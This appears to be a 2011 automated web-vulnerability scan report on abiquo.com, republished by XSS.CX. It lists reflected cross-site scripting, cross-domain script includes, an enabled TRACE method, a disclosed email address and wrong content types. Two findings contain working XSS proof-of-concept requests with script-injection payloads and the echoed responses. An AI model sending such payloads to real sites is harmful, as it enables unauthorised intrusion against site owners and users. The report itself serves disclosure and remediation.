XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, abiquo.com

Report generated by XSS.CX at Tue Aug 16 11:11:39 GMT-06:00 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. Cross-site scripting (reflected)

XSS in abiquo.com, XSS, DORK, GHDB, Cross Site Scripting, CWE-79, CAPEC-86

1.1. http://abiquo.com/ [name of an arbitrarily supplied request parameter]

1.2. http://abiquo.com/products/abiquo-overview.php [name of an arbitrarily supplied request parameter]

2. Cross-domain script include

2.1. http://abiquo.com/

2.2. http://abiquo.com/products/abiquo-overview.php

3. TRACE method is enabled

4. Email addresses disclosed

5. Content type incorrectly stated

5.1. http://abiquo.com/favicon.ico

5.2. http://abiquo.com/forms/rules/requestdemo.json



1. Cross-site scripting (reflected)  next
There are 2 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://abiquo.com/ [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://abiquo.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74a84"><script>alert(1)</script>240e25f136 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?74a84"><script>alert(1)</script>240e25f136=1 HTTP/1.1
Host: abiquo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 17:08:09 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: max-age=3600
Expires: Tue, 16 Aug 2011 18:08:09 GMT
Vary: Accept-Encoding
Content-Length: 16083
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-gb" xml:lang="en-gb" class="en">
   <head>
               <meta http-equiv="content-type" content="text/html; charset=utf-8" />
       <meta http-equi
...[SNIP]...
<a href="http://www.abiquo.com/?74a84"><script>alert(1)</script>240e25f136=1" class="lang en selected">
...[SNIP]...

1.2. http://abiquo.com/products/abiquo-overview.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://abiquo.com
Path:   /products/abiquo-overview.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71f59"><script>alert(1)</script>7d01024d3ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/abiquo-overview.php?71f59"><script>alert(1)</script>7d01024d3ac=1 HTTP/1.1
Host: abiquo.com
Proxy-Connection: keep-alive
Referer: http://abiquo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vt_=NDk3MDYxNjBiZjNjNjczMjMyYWEzOTYxM2I1YWE5NzE%3D; __utma=73009475.1569214701.1313514499.1313514499.1313514499.1; __utmb=73009475.1.10.1313514499; __utmc=73009475; __utmz=73009475.1313514499.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); visitor_id5702=67507672; _lf1.acr_=Products

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 17:09:26 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: max-age=3600
Expires: Tue, 16 Aug 2011 18:09:26 GMT
Vary: Accept-Encoding
Content-Length: 31707
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-gb" xml:lang="en-gb" class="en">
   <head>
               <meta http-equiv="content-type" content="text/html; charset=utf-8" />
       <meta http-equi
...[SNIP]...
<a href="http://www.abiquo.com/products/abiquo-overview.php?71f59"><script>alert(1)</script>7d01024d3ac=1" class="lang en selected">
...[SNIP]...

2. Cross-domain script include  previous  next
There are 2 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


2.1. http://abiquo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://abiquo.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: abiquo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 17:07:59 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: max-age=3600
Expires: Tue, 16 Aug 2011 18:07:59 GMT
Vary: Accept-Encoding
Content-Length: 15714
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-gb" xml:lang="en-gb" class="en">
   <head>
               <meta http-equiv="content-type" content="text/html; charset=utf-8" />
       <meta http-equi
...[SNIP]...
</script>
       <script type="text/javascript" language="javascript" src="http://t5.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

2.2. http://abiquo.com/products/abiquo-overview.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://abiquo.com
Path:   /products/abiquo-overview.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /products/abiquo-overview.php HTTP/1.1
Host: abiquo.com
Proxy-Connection: keep-alive
Referer: http://abiquo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vt_=NDk3MDYxNjBiZjNjNjczMjMyYWEzOTYxM2I1YWE5NzE%3D; __utma=73009475.1569214701.1313514499.1313514499.1313514499.1; __utmb=73009475.1.10.1313514499; __utmc=73009475; __utmz=73009475.1313514499.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); visitor_id5702=67507672; _lf1.acr_=Products

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 17:08:51 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: max-age=3600
Expires: Tue, 16 Aug 2011 18:08:51 GMT
Vary: Accept-Encoding
Content-Length: 31523
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-gb" xml:lang="en-gb" class="en">
   <head>
               <meta http-equiv="content-type" content="text/html; charset=utf-8" />
       <meta http-equi
...[SNIP]...
</script>
       <script type="text/javascript" language="javascript" src="http://t5.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

3. TRACE method is enabled  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://abiquo.com
Path:   /

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

Request

TRACE / HTTP/1.0
Host: abiquo.com
Cookie: 95134aeb70e1adfd

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 17:08:00 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: abiquo.com
Cookie: 95134aeb70e1adfd


4. Email addresses disclosed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://abiquo.com
Path:   /scripts/jquery.abiquovticker.js

Issue detail

The following email address was disclosed in the response:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

Request

GET /scripts/jquery.abiquovticker.js HTTP/1.1
Host: abiquo.com
Proxy-Connection: keep-alive
Referer: http://abiquo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 17:08:01 GMT
Server: Apache
Last-Modified: Tue, 07 Jun 2011 14:21:14 GMT
ETag: "80445-e47-eeb12a80"
Accept-Ranges: bytes
Content-Length: 3655
Cache-Control: max-age=3600
Expires: Tue, 16 Aug 2011 18:03:37 GMT
Age: 263
Content-Type: application/x-javascript

/*
* vertical news ticker
* Tadas Juozapaitis ( kasp3rito@gmail.com )
* http://plugins.jquery.com/project/vTicker
*/
(function($){
$.fn.vTicker = function(options) {
   var defaults = {
       speed: 700,
       pause: 4000,
       showItems: 3,
       animation: '',
       mousePause: true,
       
...[SNIP]...

5. Content type incorrectly stated  previous
There are 2 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


5.1. http://abiquo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://abiquo.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: abiquo.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vt_=NDk3MDYxNjBiZjNjNjczMjMyYWEzOTYxM2I1YWE5NzE%3D; __utma=73009475.1569214701.1313514499.1313514499.1313514499.1; __utmb=73009475.1.10.1313514499; __utmc=73009475; __utmz=73009475.1313514499.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); visitor_id5702=67507672

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 17:08:15 GMT
Server: Apache
Last-Modified: Tue, 07 Jun 2011 14:21:08 GMT
ETag: "7e27a-57e-ee559d00"
Accept-Ranges: bytes
Content-Length: 1406
Cache-Control: max-age=3600
Expires: Tue, 16 Aug 2011 18:03:39 GMT
Age: 276
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...........@...............................ttt......c../;C.....WVU......Pq.    ...0($..t..G@<..........[..+DV.831..Fb.jjj.DGK..........l.......a..;;<.MOR.m......,-......(I
...[SNIP]...

5.2. http://abiquo.com/forms/rules/requestdemo.json  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://abiquo.com
Path:   /forms/rules/requestdemo.json

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain JSON.

Request

GET /forms/rules/requestdemo.json HTTP/1.1
Host: abiquo.com
Proxy-Connection: keep-alive
Referer: http://abiquo.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vt_=NDk3MDYxNjBiZjNjNjczMjMyYWEzOTYxM2I1YWE5NzE%3D; __utma=73009475.1569214701.1313514499.1313514499.1313514499.1; __utmb=73009475.1.10.1313514499; __utmc=73009475; __utmz=73009475.1313514499.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); visitor_id5702=67507672; _lf1.acr_=%3Cdiv%20class%3D%22panel-corner%22%3E%3Ch2%3EDemonstration%3C%2Fh2%3E%0A%0A%3Cul%3E%0A%3Cli%3EBook%20a%20live%20demonstration%20to%20experience%20the%20Abiquo%20solution%20and%20try%20out%20features%20like%20automatic%20conversion%20between%20hypervisors.%3C%2Fli%3E%0A%3C%2Ful%3E%0A%3C%2Fdiv%3E

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 17:08:38 GMT
Server: Apache
Last-Modified: Tue, 07 Jun 2011 14:21:10 GMT
ETag: "80158-16c-ee742180"
Accept-Ranges: bytes
Content-Length: 364
Cache-Control: max-age=3600
Expires: Tue, 16 Aug 2011 18:08:37 GMT
Age: 1
Content-Type: text/plain; charset=UTF-8

{
   "rules": {
       "first_name": { "required": true },
       "last_name": { "required": true },                
       "email_address": { "required": true, "email": true },
       "phone": { "required": true, "phone": true, "minl
...[SNIP]...

Report generated by XSS.CX at Tue Aug 16 11:11:39 GMT-06:00 2011.